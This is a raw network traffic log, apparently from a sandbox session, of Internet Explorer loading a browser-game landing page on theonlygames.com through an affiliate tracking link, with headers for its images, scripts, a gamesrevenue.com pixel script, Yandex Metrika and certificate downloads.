Referer: https://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/index.html?p1=https%3A//click.hooligapps.com/%3Fpid%3D3%26offer_id%3D4%26ref_id%3DVjN8MTQ1NzY3ODN8MjU3NzI0OHwxNTc2MDF8MTYzMDkyMDg2MnwwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDB8MTU0LjYxLjcxLjUxfDJ8c2g9NzY4ODU3N2VhMjE2ZWVmNjI1MDE5NjdlNGRkYmExYjcyMTAzMjQ1YzE1Y2IxNjRlZmY1MTdiNGE0NDVlMjA2MmQwZTYzOGFmMjU3MTlmODBiNTYxYjE1ZDVmMWJiYTM4ZWNhYWY1Mjc0NTcyYzYxYjYxNWY3NGJjM2E3Zjg0ZWNlYmUyMzg2OTIyM2UxOTc4YmIwMDYwNmI1OWM5MzQ0NGM2OGRjOGIyfGRhYmI5YTdkYjUzOWM4OWUwYjFiY2E1MWYxZWM3YmYz%26sub1%3Dpu_final%26sub2%3D14576783
Accept-Language: ja-JP
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: theonlygames.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:34:31 GMT
Content-Type: image/png
Content-Length: 20362
Connection: keep-alive
last-modified: Mon, 07 Sep 2020 15:54:41 GMT
etag: "5f5657c1-4f8a"
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 590
Accept-Ranges: bytes
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jZyj%2BSrbBWE68d9hDzrfjfWTLJFghXOsQVU%2BdrpG40bxbrAe2%2FO83TBgnt%2F40CsD8SmOuSZBvUE3VoaCmWoXwoPO1TGChfg95tZPuftc2e5Iv85gAwUh6rcA0TXbvyT0iVsg"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 68a6b3b8d95ffa44-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
-
GEThttps://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/scripts/main.jsRemote address:104.21.235.54:443RequestGET /ft/ft_0719/land_ft_310719_na_en/scripts/main.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/index.html?p1=https%3A//click.hooligapps.com/%3Fpid%3D3%26offer_id%3D4%26ref_id%3DVjN8MTQ1NzY3ODN8MjU3NzI0OHwxNTc2MDF8MTYzMDkyMDg2MnwwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDB8MTU0LjYxLjcxLjUxfDJ8c2g9NzY4ODU3N2VhMjE2ZWVmNjI1MDE5NjdlNGRkYmExYjcyMTAzMjQ1YzE1Y2IxNjRlZmY1MTdiNGE0NDVlMjA2MmQwZTYzOGFmMjU3MTlmODBiNTYxYjE1ZDVmMWJiYTM4ZWNhYWY1Mjc0NTcyYzYxYjYxNWY3NGJjM2E3Zjg0ZWNlYmUyMzg2OTIyM2UxOTc4YmIwMDYwNmI1OWM5MzQ0NGM2OGRjOGIyfGRhYmI5YTdkYjUzOWM4OWUwYjFiY2E1MWYxZWM3YmYz%26sub1%3Dpu_final%26sub2%3D14576783
Accept-Language: ja-JP
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: theonlygames.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:34:31 GMT
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
last-modified: Thu, 15 Jul 2021 12:31:41 GMT
etag: W/"60f02aad-1df"
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 564
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hxU6jxv2EL11WsF%2BTIVESdc6zNcWRHmJf17EwEgax4%2B24xLfYtvGJcPjbLxA7k29%2BLdG4eeHCWJ2w30CM5CZsk%2BIWH9QYMJsbrmRfhMx4mRywHQQWJ4pM6Y%2FWXdhk6PNo5vC"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 68a6b3b74f390c05-AMS
Content-Encoding: gzip
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
-
GEThttps://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/image/kletka_black1.pngRemote address:104.21.235.54:443RequestGET /ft/ft_0719/land_ft_310719_na_en/image/kletka_black1.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/index.html?p1=https%3A//click.hooligapps.com/%3Fpid%3D3%26offer_id%3D4%26ref_id%3DVjN8MTQ1NzY3ODN8MjU3NzI0OHwxNTc2MDF8MTYzMDkyMDg2MnwwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDB8MTU0LjYxLjcxLjUxfDJ8c2g9NzY4ODU3N2VhMjE2ZWVmNjI1MDE5NjdlNGRkYmExYjcyMTAzMjQ1YzE1Y2IxNjRlZmY1MTdiNGE0NDVlMjA2MmQwZTYzOGFmMjU3MTlmODBiNTYxYjE1ZDVmMWJiYTM4ZWNhYWY1Mjc0NTcyYzYxYjYxNWY3NGJjM2E3Zjg0ZWNlYmUyMzg2OTIyM2UxOTc4YmIwMDYwNmI1OWM5MzQ0NGM2OGRjOGIyfGRhYmI5YTdkYjUzOWM4OWUwYjFiY2E1MWYxZWM3YmYz%26sub1%3Dpu_final%26sub2%3D14576783
Accept-Language: ja-JP
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: theonlygames.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:34:31 GMT
Content-Type: image/png
Content-Length: 79420
Connection: keep-alive
last-modified: Mon, 07 Sep 2020 15:54:41 GMT
etag: "5f5657c1-1363c"
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 590
Accept-Ranges: bytes
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fEhz66hLjonsrwvNdTc7Rel8JuiZdRoLpfBY064s91zeP%2FZHG8mjLhgMtNVA4rUskD4I%2Bn5sdozC8gkTUKjFZjPwOCQhhFQNPfMtiud27yMkSsCtzfjyJsd3poNQaiHJHQx1"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 68a6b3b7e83c0c05-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
-
GEThttps://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/image/bg_layer.pngRemote address:104.21.235.54:443RequestGET /ft/ft_0719/land_ft_310719_na_en/image/bg_layer.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/index.html?p1=https%3A//click.hooligapps.com/%3Fpid%3D3%26offer_id%3D4%26ref_id%3DVjN8MTQ1NzY3ODN8MjU3NzI0OHwxNTc2MDF8MTYzMDkyMDg2MnwwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDB8MTU0LjYxLjcxLjUxfDJ8c2g9NzY4ODU3N2VhMjE2ZWVmNjI1MDE5NjdlNGRkYmExYjcyMTAzMjQ1YzE1Y2IxNjRlZmY1MTdiNGE0NDVlMjA2MmQwZTYzOGFmMjU3MTlmODBiNTYxYjE1ZDVmMWJiYTM4ZWNhYWY1Mjc0NTcyYzYxYjYxNWY3NGJjM2E3Zjg0ZWNlYmUyMzg2OTIyM2UxOTc4YmIwMDYwNmI1OWM5MzQ0NGM2OGRjOGIyfGRhYmI5YTdkYjUzOWM4OWUwYjFiY2E1MWYxZWM3YmYz%26sub1%3Dpu_final%26sub2%3D14576783
Accept-Language: ja-JP
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: theonlygames.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:34:31 GMT
Content-Type: image/png
Content-Length: 40850
Connection: keep-alive
last-modified: Mon, 07 Sep 2020 15:54:41 GMT
etag: "5f5657c1-9f92"
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 578
Accept-Ranges: bytes
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9ompGmybhJ%2FuJhJNE4i%2BQJ8shIrF%2FgOR%2BOii6O0mujMT6rnPNguuBGxC0%2F38wOc%2Fdw2Zw8P37mKIqvnjTLwjxZv2lk5ZcXTPl9sd%2BqYe0lxdGZXdTFjatx2Luo2BxCKR70bJ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 68a6b3b739bf1f95-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
-
GEThttps://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/image/kletka_color1.pngRemote address:104.21.235.54:443RequestGET /ft/ft_0719/land_ft_310719_na_en/image/kletka_color1.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/index.html?p1=https%3A//click.hooligapps.com/%3Fpid%3D3%26offer_id%3D4%26ref_id%3DVjN8MTQ1NzY3ODN8MjU3NzI0OHwxNTc2MDF8MTYzMDkyMDg2MnwwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDB8MTU0LjYxLjcxLjUxfDJ8c2g9NzY4ODU3N2VhMjE2ZWVmNjI1MDE5NjdlNGRkYmExYjcyMTAzMjQ1YzE1Y2IxNjRlZmY1MTdiNGE0NDVlMjA2MmQwZTYzOGFmMjU3MTlmODBiNTYxYjE1ZDVmMWJiYTM4ZWNhYWY1Mjc0NTcyYzYxYjYxNWY3NGJjM2E3Zjg0ZWNlYmUyMzg2OTIyM2UxOTc4YmIwMDYwNmI1OWM5MzQ0NGM2OGRjOGIyfGRhYmI5YTdkYjUzOWM4OWUwYjFiY2E1MWYxZWM3YmYz%26sub1%3Dpu_final%26sub2%3D14576783
Accept-Language: ja-JP
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: theonlygames.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:34:31 GMT
Content-Type: image/png
Content-Length: 87117
Connection: keep-alive
last-modified: Mon, 07 Sep 2020 15:54:41 GMT
etag: "5f5657c1-1544d"
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 545
Accept-Ranges: bytes
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1BMo%2FK2nV4NHdIyfTAhMDZ9PKclLVnCnmAQ%2BRBKiGqpYzucNwdJbzeRpnkB7z7sHe3jtK2GCa0agTUlk%2B%2F35u9J9W3%2BDvTWncGC%2FDZTh%2BClyVDJUe27mOvAWiBT%2FHRkOUvRh"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 68a6b3b8db4c1f95-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
-
GEThttps://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/image/bg.jpgRemote address:104.21.235.54:443RequestGET /ft/ft_0719/land_ft_310719_na_en/image/bg.jpg HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/index.html?p1=https%3A//click.hooligapps.com/%3Fpid%3D3%26offer_id%3D4%26ref_id%3DVjN8MTQ1NzY3ODN8MjU3NzI0OHwxNTc2MDF8MTYzMDkyMDg2MnwwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDB8MTU0LjYxLjcxLjUxfDJ8c2g9NzY4ODU3N2VhMjE2ZWVmNjI1MDE5NjdlNGRkYmExYjcyMTAzMjQ1YzE1Y2IxNjRlZmY1MTdiNGE0NDVlMjA2MmQwZTYzOGFmMjU3MTlmODBiNTYxYjE1ZDVmMWJiYTM4ZWNhYWY1Mjc0NTcyYzYxYjYxNWY3NGJjM2E3Zjg0ZWNlYmUyMzg2OTIyM2UxOTc4YmIwMDYwNmI1OWM5MzQ0NGM2OGRjOGIyfGRhYmI5YTdkYjUzOWM4OWUwYjFiY2E1MWYxZWM3YmYz%26sub1%3Dpu_final%26sub2%3D14576783
Accept-Language: ja-JP
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: theonlygames.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:34:41 GMT
Content-Type: image/jpeg
Content-Length: 264671
Connection: keep-alive
last-modified: Mon, 07 Sep 2020 15:54:41 GMT
etag: "5f5657c1-409df"
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 587
Accept-Ranges: bytes
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xgYzfZeZO1%2Ff8KQx0w4C626rYAnDPp3eSMjeL%2BFcDb%2FKjzvwJJ3gHpOIXbLgCNY3cA%2FZS77oAWT4x7gPN8TdRVnknnP53Ov%2FnLauqOvms1cgMMe4IaR5qcfwSYP4F3SB2sJ8"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 68a6b3f66d761f95-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
-
GEThttps://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/image/favft.pngRemote address:104.21.235.54:443RequestGET /ft/ft_0719/land_ft_310719_na_en/image/favft.png HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: theonlygames.com
Connection: Keep-Alive
Cookie: _ym_uid=1630920713230965631; _ym_d=1630920713
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:35:31 GMT
Content-Type: image/png
Content-Length: 1086
Connection: keep-alive
last-modified: Mon, 07 Sep 2020 15:54:41 GMT
etag: "5f5657c1-43e"
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 7190
Accept-Ranges: bytes
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0uAiaBo%2B%2FYhYXjRr8ipL4fgIEftQLg1bxlAbDXMYHasrDCBo8aphSS7X5hl%2FQtB69RF1kDCYFYMbLh3ehNrDT%2B8ekHvuyhoD3k4Bh40b3BQA6E5%2BvdMogwAYh8UY%2FSunDZL5"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 68a6b52c19351f95-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
-
GEThttps://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/image/kletka_black2.pngRemote address:104.21.235.54:443RequestGET /ft/ft_0719/land_ft_310719_na_en/image/kletka_black2.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/index.html?p1=https%3A//click.hooligapps.com/%3Fpid%3D3%26offer_id%3D4%26ref_id%3DVjN8MTQ1NzY3ODN8MjU3NzI0OHwxNTc2MDF8MTYzMDkyMDg2MnwwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDB8MTU0LjYxLjcxLjUxfDJ8c2g9NzY4ODU3N2VhMjE2ZWVmNjI1MDE5NjdlNGRkYmExYjcyMTAzMjQ1YzE1Y2IxNjRlZmY1MTdiNGE0NDVlMjA2MmQwZTYzOGFmMjU3MTlmODBiNTYxYjE1ZDVmMWJiYTM4ZWNhYWY1Mjc0NTcyYzYxYjYxNWY3NGJjM2E3Zjg0ZWNlYmUyMzg2OTIyM2UxOTc4YmIwMDYwNmI1OWM5MzQ0NGM2OGRjOGIyfGRhYmI5YTdkYjUzOWM4OWUwYjFiY2E1MWYxZWM3YmYz%26sub1%3Dpu_final%26sub2%3D14576783
Accept-Language: ja-JP
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: theonlygames.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:34:31 GMT
Content-Type: image/png
Content-Length: 74316
Connection: keep-alive
last-modified: Mon, 07 Sep 2020 15:54:41 GMT
etag: "5f5657c1-1224c"
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 577
Accept-Ranges: bytes
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JZQVflouB2Hn6%2BVfF2LsdqOZmyyUNfoEyoadabQGhTxxEKdUVZ91Osf3FnVttH2XxejxYu29Si%2Fty3oqyn0qI0A%2BfpxMJwukuRdoXyLgVinIFs%2Bx1cfdqUYUSi5MSlWSVViY"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 68a6b3b738c90bfd-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
-
GEThttps://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/image/kletka_color2.pngRemote address:104.21.235.54:443RequestGET /ft/ft_0719/land_ft_310719_na_en/image/kletka_color2.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/index.html?p1=https%3A//click.hooligapps.com/%3Fpid%3D3%26offer_id%3D4%26ref_id%3DVjN8MTQ1NzY3ODN8MjU3NzI0OHwxNTc2MDF8MTYzMDkyMDg2MnwwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDB8MTU0LjYxLjcxLjUxfDJ8c2g9NzY4ODU3N2VhMjE2ZWVmNjI1MDE5NjdlNGRkYmExYjcyMTAzMjQ1YzE1Y2IxNjRlZmY1MTdiNGE0NDVlMjA2MmQwZTYzOGFmMjU3MTlmODBiNTYxYjE1ZDVmMWJiYTM4ZWNhYWY1Mjc0NTcyYzYxYjYxNWY3NGJjM2E3Zjg0ZWNlYmUyMzg2OTIyM2UxOTc4YmIwMDYwNmI1OWM5MzQ0NGM2OGRjOGIyfGRhYmI5YTdkYjUzOWM4OWUwYjFiY2E1MWYxZWM3YmYz%26sub1%3Dpu_final%26sub2%3D14576783
Accept-Language: ja-JP
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: theonlygames.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:34:31 GMT
Content-Type: image/png
Content-Length: 77825
Connection: keep-alive
last-modified: Mon, 07 Sep 2020 15:54:41 GMT
etag: "5f5657c1-13001"
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 615
Accept-Ranges: bytes
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cY6JE0Tsieny1AJskp5bU%2F6LRsYAXhx%2F7cVmVKUYT7E0NLUFFRktvvXq9KvP7nhkp6SjYynbur29w1c1qpwmKLuIofYl62f%2B1kcu3brAHIGaYEXWVKqv3ZCIRDuUtgGSSuky"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 68a6b3b73e87426c-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
-
GEThttps://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/image/logofun.pngRemote address:104.21.235.54:443RequestGET /ft/ft_0719/land_ft_310719_na_en/image/logofun.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/index.html?p1=https%3A//click.hooligapps.com/%3Fpid%3D3%26offer_id%3D4%26ref_id%3DVjN8MTQ1NzY3ODN8MjU3NzI0OHwxNTc2MDF8MTYzMDkyMDg2MnwwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDB8MTU0LjYxLjcxLjUxfDJ8c2g9NzY4ODU3N2VhMjE2ZWVmNjI1MDE5NjdlNGRkYmExYjcyMTAzMjQ1YzE1Y2IxNjRlZmY1MTdiNGE0NDVlMjA2MmQwZTYzOGFmMjU3MTlmODBiNTYxYjE1ZDVmMWJiYTM4ZWNhYWY1Mjc0NTcyYzYxYjYxNWY3NGJjM2E3Zjg0ZWNlYmUyMzg2OTIyM2UxOTc4YmIwMDYwNmI1OWM5MzQ0NGM2OGRjOGIyfGRhYmI5YTdkYjUzOWM4OWUwYjFiY2E1MWYxZWM3YmYz%26sub1%3Dpu_final%26sub2%3D14576783
Accept-Language: ja-JP
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: theonlygames.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:34:31 GMT
Content-Type: image/png
Content-Length: 23368
Connection: keep-alive
last-modified: Mon, 07 Sep 2020 15:54:41 GMT
etag: "5f5657c1-5b48"
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 589
Accept-Ranges: bytes
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=99xbvNvJCgYqtbAfhD%2BfCUrcTkK4UnZQbo3e3I3Y%2FYvyMEpxxohBTpuX5rGnrmOFA2mGzR2hV6RBtuD2alD27u7BLtqb2ulnyAGw24RyEe1KQurEFo3bSRxabelhwH9hKRar"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 68a6b3b8d8c8426c-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
-
DNSln.gamesrevenue.comRemote address:8.8.8.8:53Requestln.gamesrevenue.comIN AResponseln.gamesrevenue.comIN A204.155.147.176
-
GEThttps://ln.gamesrevenue.com/px1.jsRemote address:204.155.147.176:443RequestGET /px1.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/index.html?p1=https%3A//click.hooligapps.com/%3Fpid%3D3%26offer_id%3D4%26ref_id%3DVjN8MTQ1NzY3ODN8MjU3NzI0OHwxNTc2MDF8MTYzMDkyMDg2MnwwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDB8MTU0LjYxLjcxLjUxfDJ8c2g9NzY4ODU3N2VhMjE2ZWVmNjI1MDE5NjdlNGRkYmExYjcyMTAzMjQ1YzE1Y2IxNjRlZmY1MTdiNGE0NDVlMjA2MmQwZTYzOGFmMjU3MTlmODBiNTYxYjE1ZDVmMWJiYTM4ZWNhYWY1Mjc0NTcyYzYxYjYxNWY3NGJjM2E3Zjg0ZWNlYmUyMzg2OTIyM2UxOTc4YmIwMDYwNmI1OWM5MzQ0NGM2OGRjOGIyfGRhYmI5YTdkYjUzOWM4OWUwYjFiY2E1MWYxZWM3YmYz%26sub1%3Dpu_final%26sub2%3D14576783
Accept-Language: ja-JP
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: ln.gamesrevenue.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:34:40 GMT
Content-Type: application/javascript
Last-Modified: Thu, 26 Aug 2021 12:41:35 GMT
Transfer-Encoding: chunked
Connection: close
ETag: W/"61278bff-387e"
Content-Encoding: gzip
-
DNSmc.yandex.ruRemote address:8.8.8.8:53Requestmc.yandex.ruIN AResponsemc.yandex.ruIN A87.250.251.119mc.yandex.ruIN A87.250.250.119mc.yandex.ruIN A77.88.21.119mc.yandex.ruIN A93.158.134.119
-
DNSrepository.certum.plRemote address:8.8.8.8:53Requestrepository.certum.plIN AResponserepository.certum.plIN CNAMErepository.akamai.certum.plrepository.akamai.certum.plIN CNAMErepository.certum.pl.edgekey.netrepository.certum.pl.edgekey.netIN CNAMEe99038.dscb.akamaiedge.nete99038.dscb.akamaiedge.netIN A104.110.191.14e99038.dscb.akamaiedge.netIN A104.110.191.15
-
GEThttp://repository.certum.pl/ca.cerRemote address:104.110.191.14:80RequestGET /ca.cer HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: repository.certum.pl
ResponseHTTP/1.1 200 OK
Content-Type: application/pkix-cert
Content-Length: 784
Last-Modified: Fri, 06 Mar 2020 09:54:01 GMT
Accept-Ranges: bytes
Cache-Control: public, max-age=557
Date: Mon, 06 Sep 2021 09:34:53 GMT
Connection: keep-alive
-
GEThttp://repository.certum.pl/ca.cerRemote address:104.110.191.14:80RequestGET /ca.cer HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: repository.certum.pl
ResponseHTTP/1.1 200 OK
Content-Type: application/pkix-cert
Content-Length: 784
Last-Modified: Fri, 06 Mar 2020 09:54:01 GMT
Accept-Ranges: bytes
Cache-Control: public, max-age=556
Date: Mon, 06 Sep 2021 09:34:54 GMT
Connection: keep-alive
-
GEThttps://mc.yandex.ru/metrika/tag.jsRemote address:87.250.251.119:443RequestGET /metrika/tag.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Accept-Language: ja-JP
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: mc.yandex.ru
Connection: Keep-Alive
